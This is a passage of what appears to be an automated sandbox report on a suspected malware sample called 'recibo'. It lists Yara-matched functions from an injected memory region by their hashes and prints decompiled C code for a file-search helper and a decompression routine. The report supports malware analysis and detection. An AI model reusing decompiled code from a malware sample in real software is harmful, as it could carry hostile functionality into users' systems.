                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 3301a25c822955c24cc35bc96135e3befe9459666ca8ee92c65da1ed440fc582
                                                                                  • Instruction ID: b75291faf1c99957f24f0ac79cec1c40f5386ace3c54a8829f826ea3467bb475
                                                                                  • Opcode Fuzzy Hash: 3301a25c822955c24cc35bc96135e3befe9459666ca8ee92c65da1ed440fc582
                                                                                  • Instruction Fuzzy Hash: 1C91D146E3E30699EB93303681B53E71385CF172C1D66875BCC6BB2865B71B0A8E85C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0C23 Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 371cd6644c7f73c504c1bf8efc0898d81824d87119c0845be80723ba822b9ba8
                                                                                  • Instruction ID: 049692deed0c5ddae41eba86a3782d27883f874ea186cac7318f21532977dd30
                                                                                  • Opcode Fuzzy Hash: 371cd6644c7f73c504c1bf8efc0898d81824d87119c0845be80723ba822b9ba8
                                                                                  • Instruction Fuzzy Hash: 17910346E3E30598EB93303681B53E71345CF132C1E26875BCC5BB2865771B0A8EC5C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0CD6 Relevance: 1.6, Strings: 1, Instructions: 361COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Fo
                                                                                  • API String ID: 0-989300405
                                                                                  • Opcode ID: 254d53505fadf424310141e82b00ae4f4e5837e3add748fe074b9a05d2f94c58
                                                                                  • Instruction ID: e928b5cb0c00b45545cdccdc0d56a562853239a20bf1ebc1e66a95d56fd31db4
                                                                                  • Opcode Fuzzy Hash: 254d53505fadf424310141e82b00ae4f4e5837e3add748fe074b9a05d2f94c58
                                                                                  • Instruction Fuzzy Hash: ED81E245E3E30698EB93303685753E71385CF172C1E66875FCC6BB2865B71B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 39%
                                                                                  			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040653D();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}




                                                                                  0x00402923
                                                                                  0x0040293e
                                                                                  0x00402949
                                                                                  0x0040294a
                                                                                  0x00402a94
                                                                                  0x00402925
                                                                                  0x00402928
                                                                                  0x0040292b
                                                                                  0x0040292e
                                                                                  0x0040292e
                                                                                  0x00402c2d
                                                                                  0x00402c39

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFindFirst
                                                                                  • String ID:
                                                                                  • API String ID: 1974802433-0
                                                                                  • Opcode ID: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                                                                  • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                                                  • Opcode Fuzzy Hash: 23bc45f7dafbc09bf3d58dfb9668e04a20f74da7ffae18e0ad0b6f577034eb1d
                                                                                  • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC70CE Relevance: 1.5, Strings: 1, Instructions: 269COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: 0dee7642daf65d700a0de0425d4c2d1ebe05287b9af1571a1f4a9cbc572e7a8e
                                                                                  • Instruction ID: bde1bf353cf150fcbede79a27a2c9d713b039dc10279e0eb64f8abdd83464752
                                                                                  • Opcode Fuzzy Hash: 0dee7642daf65d700a0de0425d4c2d1ebe05287b9af1571a1f4a9cbc572e7a8e
                                                                                  • Instruction Fuzzy Hash: 1171FF699442C44BC71B8A36C4A92D5BFD2EF5B320F385A9FDDC58BB56C2228847C391
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB7AE6 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: vq
                                                                                  • API String ID: 0-385929040
                                                                                  • Opcode ID: 7e89edfe9700462bf77dc2651244e2efc53a123f05c44830807aec23422932be
                                                                                  • Instruction ID: fdd2932b4d8f138667113c0da8e4cac37318b294d5e6f666fe4c63045ab732f5
                                                                                  • Opcode Fuzzy Hash: 7e89edfe9700462bf77dc2651244e2efc53a123f05c44830807aec23422932be
                                                                                  • Instruction Fuzzy Hash: 5E717A7560434A9FDF229E38DDA47EA37B6AF5A390F90412EDC9ECB205D7314A81CB41
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB8A34 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dFu\
                                                                                  • API String ID: 0-3515014742
                                                                                  • Opcode ID: d35a08705e6068e58d2acbcab295aef01d86a56b0d5dd787026bec51b03b8ee7
                                                                                  • Instruction ID: c71fc8146825e938be7faf93920cb51c6c41b6a7236d89fbda9447060b12611e
                                                                                  • Opcode Fuzzy Hash: d35a08705e6068e58d2acbcab295aef01d86a56b0d5dd787026bec51b03b8ee7
                                                                                  • Instruction Fuzzy Hash: 5E618C7560434B9FDF314D688D507EB36A79FD67A0F91471EDC88DB248D3308A838A01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CBC933 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: g_o
                                                                                  • API String ID: 0-3523772964
                                                                                  • Opcode ID: 51425ee929362d2076cd8c1d51ab630acf9664e7fc39e3e2dc472c26725f065f
                                                                                  • Instruction ID: 623d6df2ea149ee372d891887e8971f30f493eec6966ddcdb87e5486999e4708
                                                                                  • Opcode Fuzzy Hash: 51425ee929362d2076cd8c1d51ab630acf9664e7fc39e3e2dc472c26725f065f
                                                                                  • Instruction Fuzzy Hash: CA610476644349DFCB31CE2AC9D53DA7BE2AF99600F55452FCD899F608D330AA86CB01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB8AFC Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dFu\
                                                                                  • API String ID: 0-3515014742
                                                                                  • Opcode ID: 661621a30cd95bc7825ab23407c0c997bf220fe02b389d044a8dcad28a956550
                                                                                  • Instruction ID: b9ca0904c4c7f99abf858c4fa85f3d740c0ccc1ab75da156730efadb95fc18dc
                                                                                  • Opcode Fuzzy Hash: 661621a30cd95bc7825ab23407c0c997bf220fe02b389d044a8dcad28a956550
                                                                                  • Instruction Fuzzy Hash: 62517D7A5043468FCF325D798D613DB3AA79FE53B0FA5471EDC849B298D3318A878A01
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB8BC8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: dFu\
                                                                                  • API String ID: 0-3515014742
                                                                                  • Opcode ID: 13e87ec47ceb67a80b51142c2f3d09639a84301e502f35e91200331aab9d51e5
                                                                                  • Instruction ID: fe412561d9bf4e1e03f0ab40ce9b95324efccd4f185ae9035ed7d467a6e04439
                                                                                  • Opcode Fuzzy Hash: 13e87ec47ceb67a80b51142c2f3d09639a84301e502f35e91200331aab9d51e5
                                                                                  • Instruction Fuzzy Hash: 86419D795053478FCB325D7989653DB3AE7AF953B0F95461ECC889B258E331C9428B02
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB7E48 Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jL"
                                                                                  • API String ID: 0-4222006713
                                                                                  • Opcode ID: c601619ee0a70148f0ba1ec0d6c04651674b7d9b6493a533d6948bab3d7054ae
                                                                                  • Instruction ID: 99e5963a49c35a78ec13246bb3d669eb06effac063526522eec05f4d207633e8
                                                                                  • Opcode Fuzzy Hash: c601619ee0a70148f0ba1ec0d6c04651674b7d9b6493a533d6948bab3d7054ae
                                                                                  • Instruction Fuzzy Hash: 334177BF9053858FEF3B4964C8A93D63B52AF863A0F59055BCD458B154DB338A86C602
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB1636 Relevance: .5, Instructions: 497COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a5406924c3df71daa2519f8f11e2aff2888471087f913434ec5950fc03c97fa6
                                                                                  • Instruction ID: f1266341a7b7f364464693c4a0a698eeb514ed61794f62ce7b2678d389722196
                                                                                  • Opcode Fuzzy Hash: a5406924c3df71daa2519f8f11e2aff2888471087f913434ec5950fc03c97fa6
                                                                                  • Instruction Fuzzy Hash: 64C1B986E2E319C9E7933036C1717E51795CF271C2E66CB2ACC2AB2965774B0D8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB16EC Relevance: .5, Instructions: 464COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4d7679d2a6f3af8d488c0e915e3596a9cf968310c80397c40a5e007045245e70
                                                                                  • Instruction ID: 7725cdf49b7e1a4365c77faab47f213a167701227f17e1800166044cb52619d5
                                                                                  • Opcode Fuzzy Hash: 4d7679d2a6f3af8d488c0e915e3596a9cf968310c80397c40a5e007045245e70
                                                                                  • Instruction Fuzzy Hash: 09B1C986E2E319C9E7533036C1717E61795CF271C2E66CB2ACC2AB2565770F0D8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB1620 Relevance: .5, Instructions: 461COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 33d7f23ef8877711efe4e476271bc003becb3749ca67009759a33034a439b6a5
                                                                                  • Instruction ID: 17a58b4c781640fad2e6a42c97a4cf6d1b94a56917196ccdd4d269830d90f5f9
                                                                                  • Opcode Fuzzy Hash: 33d7f23ef8877711efe4e476271bc003becb3749ca67009759a33034a439b6a5
                                                                                  • Instruction Fuzzy Hash: 2CC1B986E2E319C9E7933036C1717E51795CF271C2E66CB2ACC2AB2965770B0D8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB1675 Relevance: .5, Instructions: 452COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cee5ea07c0352b018d935e3fc8624060535d43441da6c580b858105f39488122
                                                                                  • Instruction ID: 5439deffc2b783b535d924a2ff6ad92938cb94467dc8631147839c798db1bc41
                                                                                  • Opcode Fuzzy Hash: cee5ea07c0352b018d935e3fc8624060535d43441da6c580b858105f39488122
                                                                                  • Instruction Fuzzy Hash: 7BC1DA92E2E309C9E7533036C1717E557D5CF271C2E26CB2ACC2AB29657B0B0D8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB16AD Relevance: .4, Instructions: 450COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45e5603590a3fa991bb2ccc26d003547f05600f3f4e501ac5f8884103a1cc2d3
                                                                                  • Instruction ID: 5db7aa0e38999f583c23e2cf29d869f78efc31dee7b1b5fb62b5b0f26c5a235c
                                                                                  • Opcode Fuzzy Hash: 45e5603590a3fa991bb2ccc26d003547f05600f3f4e501ac5f8884103a1cc2d3
                                                                                  • Instruction Fuzzy Hash: B7C1AA86E2E319C9E7533036C1717E65795CF271C2E66CB1ACC2AB2965770B0D8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0D3C Relevance: .4, Instructions: 354COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 9674060ca9023220b5b3c1f81c8929d198fde1ce1147815505e671920fe4c4ce
                                                                                  • Instruction ID: 1073c5ececdeb791ec60f5ed4df2f6784183b7c7c2c09a7882ecbef0655a511c
                                                                                  • Opcode Fuzzy Hash: 9674060ca9023220b5b3c1f81c8929d198fde1ce1147815505e671920fe4c4ce
                                                                                  • Instruction Fuzzy Hash: 7A81F245E3D30599EB933076C5B53E71386CF132C1E66871BCC6B72865B71B0A8E88C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0DF1 Relevance: .3, Instructions: 335COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a40e6186194aa55fffac5d638f0889e42ea497a0746d3472870413231782cfe3
                                                                                  • Instruction ID: 687fb4011538f2e5ed912b28eaf6a1a784c9228d518a0d98f5a4a7476702e44a
                                                                                  • Opcode Fuzzy Hash: a40e6186194aa55fffac5d638f0889e42ea497a0746d3472870413231782cfe3
                                                                                  • Instruction Fuzzy Hash: 4171AF45E2930A99EB53307681B53E71386CF132C1E66876BCC5B72865B71B0A8E89C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00406D85 Relevance: .3, Instructions: 334COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 79%
                                                                                  			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
